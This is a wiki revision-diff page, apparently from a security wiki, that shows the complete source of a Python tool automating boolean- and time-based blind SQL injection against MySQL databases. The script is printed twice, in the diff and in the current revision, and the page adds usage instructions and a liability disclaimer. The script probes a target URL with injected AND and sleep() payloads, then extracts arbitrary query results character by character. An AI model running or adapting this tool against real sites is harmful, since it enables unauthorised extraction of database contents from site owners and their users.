Questions about this topic? Sign up to ask in the talk tab.

Difference between revisions of "SQL injection/mysqli-blindutils/sqli-slee.py"

From NetSec
Jump to: navigation, search
Line 13: Line 13:
 
{{code|text= <source lang="python">
 
{{code|text= <source lang="python">
 
#!/usr/bin/python
 
#!/usr/bin/python
 
+
 
import sys,re,urllib,urllib2,string,time
 
import sys,re,urllib,urllib2,string,time
 
from optparse import OptionParser
 
from optparse import OptionParser
 
from urllib2 import Request,urlopen,URLError,HTTPError
 
from urllib2 import Request,urlopen,URLError,HTTPError
 
+
 
def request(URL):
 
def request(URL):
useragent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' }
+
  user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' }
req = urllib2.Request(URL, None, useragent)
+
  req = urllib2.Request(URL, None, user_agent)
try:
+
  request=urllib2.urlopen(req)
+
except HTTPError,  e:
+
  print('[!] The server couldnt fulfill the request.')
+
  print('[!] Error code: '+str(e.code))
+
  sys.exit(1)
+
except URLError,  e:
+
  print('[!] We failed to reach a server.')
+
  print('[!] Reason: '+str(e.reason))
+
  sys.exit(1)
+
return len(request.read())
+
  
 +
  try:
 +
    request = urllib2.urlopen(req)
 +
 +
  except HTTPError, e:
 +
    print('[!] The server couldnt fulfill the request.')
 +
    print('[!] Error code: ' + str(e.code))
 +
    sys.exit(1)
 +
 +
  except URLError, e:
 +
    print('[!] We failed to reach a server.')
 +
    print('[!] Reason: ' + str(e.reason))
 +
    sys.exit(1)
 +
 +
  return len(request.read())
 +
 
def value(URL):
 
def value(URL):
target=0
+
  target = 0
end=0
+
  end = 0
nextmaybe=0
+
  next_maybe = 0
floor=0
+
  floor = 0
ceiling=255
+
  ceiling = 255
maybe = int(ceiling)/2
+
  maybe = int(ceiling)/2
while(end!=9):
+
 
  if iswhat(URL, maybe, '>'):
+
  while(end != 9):
    floor = maybe
+
    if(is_what(URL, maybe, '>')):
    nextmaybe = int(maybe + ((ceiling - floor)/2))
+
      floor = maybe
  elif iswhat(URL, maybe, '<'):
+
      next_maybe = int(maybe + ((ceiling - floor)/2))
    ceiling = maybe
+
 
    nextmaybe = int(maybe - ((ceiling - floor)/2))
+
    elif(is_what(URL, maybe, '<')):
  elif iswhat(URL, maybe, '='):
+
      ceiling = maybe
    return chr(maybe)
+
      next_maybe = int(maybe - ((ceiling - floor)/2))
  maybe = nextmaybe
+
 
                end+=1
+
    elif(is_what(URL, maybe, '=')):
        return 'done'
+
      return chr(maybe)
 +
 
 +
    maybe = next_maybe
 +
    end += 1
  
 +
  return 'done'
 +
 +
def is_what(URL, maybe, op):
 +
  if(sqli_type == 'boolean'):
 +
    ValueResponse = int(request(str(URL) + str(op) + str(maybe) + '--+'))
 +
    if(TrueResponse == ValueResponse):
 +
      return 1
 +
    else:
 +
      return 0
 +
  elif(sqli_type == 'time'):
 +
    start = time.time()
 +
    ValueResonse = request(str(URL) + str(op) + str(maybe) + ')*2)--+')
 +
    elapsed_time = (time.time() - start)
 +
    if (elapsed_time > 2):
 +
      return 1
 +
    else:
 +
      return 0
 +
 +
def vuln_check(URL):
 +
  print('[+] Checking site...')
  
def iswhat(URL,maybe,op):
+
  global TrueResponse
if(sqlitype=='boolean'):
+
  TrueResponse = int(request(URL + '%20AND%2043%20like%2043--+'))
  ValueResponse=int(request(str(URL)+str(op)+str(maybe)+'--+'))
+
  FalseResponse = int(request(URL + '%20AND%2034%20like%2043--+'))
  if(TrueResponse==ValueResponse):
+
    return 1
+
  else:
+
    return 0
+
elif(sqlitype=='time'):
+
start = time.time()
+
  ValueResonse=request(str(URL)+str(op)+str(maybe)+')*2)--+')
+
  elapsedtime = (time.time() - start)
+
  if (elapsedtime > 2):
+
    return 1
+
  else:
+
    return 0
+
  
def vulncheck(URL):
+
  if(TrueResponse != FalseResponse):
print('[+] Checking site...')
+
    print('[+] Site seems to be vulnerable to boolean based blind SQL injection.')
global TrueResponse
+
    return 'boolean'
TrueResponse=int(request(URL+'%20AND%2043%20like%2043--+'))
+
  else:
FalseResponse=int(request(URL+'%20AND%2034%20like%2043--+'))
+
    start = time.time()
if(TrueResponse!=FalseResponse):
+
    SleepResponse = request(URL + '%20and%20sleep(5)--+')
  print('[+] Site seems to be vulnerable to boolean based blind SQL injection.')
+
    elapsed_time = (time.time() - start)
  return 'boolean'
+
else:
+
  start = time.time()
+
  SleepResponse=request(URL+'%20and%20sleep(5)--+')
+
  elapsedtime = (time.time() - start)
+
  if (elapsedtime > 5):
+
    print('[+] Site seems to be vulnerable to time based blind SQL injection.')
+
    return 'time'
+
  else:
+
    print('[!] Seems like site isnt vulnerable to blind SQL injection.')
+
    sys.exit(1)
+
  
 +
    if(elapsed_time > 5):
 +
      print('[+] Site seems to be vulnerable to time based blind SQL injection.')
 +
      return 'time'
 +
    else:
 +
      print('[!] Seems like site isnt vulnerable to blind SQL injection.')
 +
      sys.exit(1)
 +
 
def main():
 
def main():
print('''
+
  print('''
Auto BSQLi tool for MySQL
+
        Auto BSQLi tool for MySQL
      ''')
+
        ''')
 +
 +
  usage = 'usage: %prog -u <target> -i <injection>'
 +
  parser = OptionParser(usage=usage)
 +
  parser.add_option("-u", action="store", type="string", dest="URL", help='"http://site.tld/index.php?id=1%27"')
 +
  parser.add_option('-i', action='store', type='string', dest='INJECTION', help='"select version()"')
 +
 +
  (options, args) = parser.parse_args()
 +
  if(options.URL and options.INJECTION):
 +
    URL = options.URL
 +
    INJECTION = urllib2.quote(options.INJECTION.encode("utf8"))
 +
  else:
 +
    print('[!] Missing url or injection parameter.')
 +
    print('[!] Use --help.')
 +
    sys.exit(1)
 +
 +
  global sqli_type
 +
  sqli_type = vuln_check(URL)
 +
  position = 1
 +
  dump = ''
 +
  print('[+] Dumping data...')
  
usage = 'usage: %prog -u <target> -i <injection>'
+
  while(1):
parser = OptionParser(usage=usage)
+
    if(sqli_type == 'boolean'):
parser.add_option("-u", action="store", type="string", dest="URL",
+
      letter = value(URL + '%20and%20ascii(substr((' + INJECTION + ')%20from%20' + str(position) + '%20for%201))')
help='"http://site.tld/index.php?id=1%27"')
+
    elif(sqli_type == 'time'):
parser.add_option('-i', action='store', type='string', dest='INJECTION',
+
      letter = value(URL + '%20and%20sleep((select%20ascii(substr((' + INJECTION + ')%20from%20' + str(position) + '%20for%201))')
help='"select version()"')
+
  
(options, args) = parser.parse_args()
+
    if(letter == 'done'):
if options.URL and options.INJECTION:
+
      break
  URL=options.URL
+
  INJECTION=urllib2.quote(options.INJECTION.encode("utf8"))
+
else:
+
  print('[!] Missing url or injection parameter.')
+
  print('[!] Use --help.')
+
  sys.exit(1)
+
  
global sqlitype
+
    dump = dump + letter
sqlitype=vulncheck(URL)
+
    position += 1
position=1
+
dump=''
+
print('[+] Dumping data...')
+
while(1):
+
if(sqlitype=='boolean'):
+
letter=value(URL+'%20and%20ascii(substr(('+INJECTION+')%20from%20'+str(position)+'%20for%201))')
+
  elif(sqlitype=='time'):
+
    letter=value(URL+'%20and%20sleep((select%20ascii(substr(('+INJECTION+')%20from%20'+str(position)+'%20for%201))')
+
if(letter=='done'):
+
break
+
    dump=dump+letter
+
  position+=1
+
if(dump):
+
print('[+] Data: '+dump)
+
else:
+
print('[!] No data dumped. Check your injection.')
+
  
 +
  if(dump):
 +
    print('[+] Data: ' + dump)
 +
  else:
 +
    print('[!] No data dumped. Check your injection.')
 +
 
if __name__ == "__main__":
 
if __name__ == "__main__":
    main()
+
  main()
 
</source>}}
 
</source>}}

Revision as of 17:31, 22 September 2012

c3el4.png
This script uses time and boolean based blind SQL injection to obtain the desired information from MySQL database.

Info

The syntax of this script is: 

 python bsqli.py -u [url] -i [injection]

Example

 python bsqli.py -u "http://target.com/?id=1%27" -i "select database()"

Disclaimer

RPU0j.png The end-user is liable for his-or her own actions with the use of this software. Running this against a system you do not own without written authorization is a criminal act.

Source

 
#!/usr/bin/python
 
import sys,re,urllib,urllib2,string,time
from optparse import OptionParser
from urllib2 import Request,urlopen,URLError,HTTPError
 
def request(URL):
  user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' }
  req = urllib2.Request(URL, None, user_agent)
 
  try:
    request = urllib2.urlopen(req)
 
  except HTTPError, e:
    print('[!] The server couldnt fulfill the request.')
    print('[!] Error code: ' + str(e.code))
    sys.exit(1)
 
  except URLError, e:
    print('[!] We failed to reach a server.')
    print('[!] Reason: ' + str(e.reason))
    sys.exit(1)
 
  return len(request.read())
 
def value(URL):
  target = 0
  end = 0
  next_maybe = 0
  floor = 0
  ceiling = 255
  maybe = int(ceiling)/2
 
  while(end != 9):
    if(is_what(URL, maybe, '>')):	
      floor = maybe
      next_maybe = int(maybe + ((ceiling - floor)/2))
 
    elif(is_what(URL, maybe, '<')):
      ceiling = maybe
      next_maybe = int(maybe - ((ceiling - floor)/2))
 
    elif(is_what(URL, maybe, '=')):
      return chr(maybe)
 
    maybe = next_maybe
    end += 1
 
  return 'done'
 
def is_what(URL, maybe, op):
  if(sqli_type == 'boolean'):
    ValueResponse = int(request(str(URL) + str(op) + str(maybe) + '--+'))
    if(TrueResponse == ValueResponse):
      return 1
    else:
      return 0
  elif(sqli_type == 'time'):
    start = time.time()
    ValueResonse = request(str(URL) + str(op) + str(maybe) + ')*2)--+')
    elapsed_time = (time.time() - start)
    if (elapsed_time > 2):
      return 1
    else:
      return 0
 
def vuln_check(URL):
  print('[+] Checking site...')
 
  global TrueResponse
  TrueResponse = int(request(URL + '%20AND%2043%20like%2043--+'))
  FalseResponse = int(request(URL + '%20AND%2034%20like%2043--+'))
 
  if(TrueResponse != FalseResponse):
    print('[+] Site seems to be vulnerable to boolean based blind SQL injection.')
    return 'boolean'
  else:
    start = time.time()
    SleepResponse = request(URL + '%20and%20sleep(5)--+')
    elapsed_time = (time.time() - start)
 
    if(elapsed_time > 5):
      print('[+] Site seems to be vulnerable to time based blind SQL injection.') 
      return 'time'
    else:
      print('[!] Seems like site isnt vulnerable to blind SQL injection.')
      sys.exit(1)
 
def main():
  print('''
        Auto BSQLi tool for MySQL
        ''')
 
  usage = 'usage: %prog -u <target> -i <injection>'
  parser = OptionParser(usage=usage)
  parser.add_option("-u", action="store", type="string", dest="URL", help='"http://site.tld/index.php?id=1%27"')
  parser.add_option('-i', action='store', type='string', dest='INJECTION', help='"select version()"')
 
  (options, args) = parser.parse_args()
  if(options.URL and options.INJECTION):
    URL = options.URL
    INJECTION = urllib2.quote(options.INJECTION.encode("utf8"))
  else:
    print('[!] Missing url or injection parameter.')
    print('[!] Use --help.')
    sys.exit(1)
 
  global sqli_type
  sqli_type = vuln_check(URL)
  position = 1
  dump = ''
  print('[+] Dumping data...')
 
  while(1):
    if(sqli_type == 'boolean'):
      letter = value(URL + '%20and%20ascii(substr((' + INJECTION + ')%20from%20' + str(position) + '%20for%201))')
    elif(sqli_type == 'time'):
      letter = value(URL + '%20and%20sleep((select%20ascii(substr((' + INJECTION + ')%20from%20' + str(position) + '%20for%201))')
 
    if(letter == 'done'):
      break
 
    dump = dump + letter
    position += 1
 
  if(dump):
    print('[+] Data: ' + dump)
  else:
    print('[!] No data dumped. Check your injection.')
 
if __name__ == "__main__":
  main()
 
Retrieved from "http://nets.ec/index.php?title=SQL_injection/mysqli-blindutils/sqli-slee.py&oldid=9249"